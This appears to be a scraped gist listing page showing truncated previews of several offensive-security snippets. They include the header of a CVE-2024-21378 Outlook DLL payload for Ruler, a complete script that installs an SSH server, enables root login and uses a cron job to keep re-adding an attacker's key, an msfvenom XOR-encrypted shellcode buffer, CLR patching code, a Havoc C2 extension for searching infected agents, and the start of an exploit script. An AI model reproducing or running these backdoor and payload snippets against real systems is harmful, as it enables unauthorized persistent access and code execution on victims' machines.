This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure that the target has cron running! | |
cat << EOF > /tmp/ssh.sh | |
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p ~/.ssh && touch authorized_keys ; echo "YOUR PUBLIC KEY HERE" >> ~/.ssh/authorized_keys ; /usr/sbin/service ssh restart | |
EOF | |
chmod +x /tmp/ssh.sh | |
# This will keep adding your SSH key, you could change `>>` to `>` but that will overwrite other keys in there. | |
echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// White Knight Labs - Offensive Development | |
// Inline Assembly - Get Function Address | |
#include <iostream> | |
#include <windows.h> | |
// Function definition | |
void* GetFunctionAddress(const char* functionName) { | |
void* getFunctionAddr = nullptr; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
apt install golang -y | |
GOROOT="/usr/local/go" | |
PATH="${PATH}:${GOROOT}/bin" | |
GOPATH=$HOME/go | |
PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin" | |
go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++ | |
// | |
// Based on : | |
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/ | |
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs | |
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c | |
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <Psapi.h> | |
#include <metahost.h> | |
#include <comutil.h> | |
#include <mscoree.h> | |
#include "patch_info.h" | |
#include "base\helpers.h" | |
/** | |
* For the debug build we want: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
unsigned long hash_string(void* buffer, unsigned long size, char* extension){ | |
unsigned char current = 0; | |
unsigned long hash = 0; | |
unsigned char* currentChar = NULL; | |
hash = 1337; | |
currentChar = (void*)buffer; | |
hash++; | |
while(1){ | |
current = *currentChar; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdint> | |
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
unsigned char buf[] = | |
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# Made by papi | |
# Created on: Di 10 Okt 2023 01:54:42 CEST | |
# auto_suite.py | |
# Description: | |
# A havoc extention to search for files inside of infected agents | |
# Usage: | |
# To use this script save it on your machine and add it to the script manager of Havoc | |
# inside of: Scripts > Scripts Manager > Load Script |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import requests | |
import sys | |
import uuid | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
#Disable annoying warnings about using burp proxy. | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
http_proxy = "http://127.0.0.1:8080" |
NewerOlder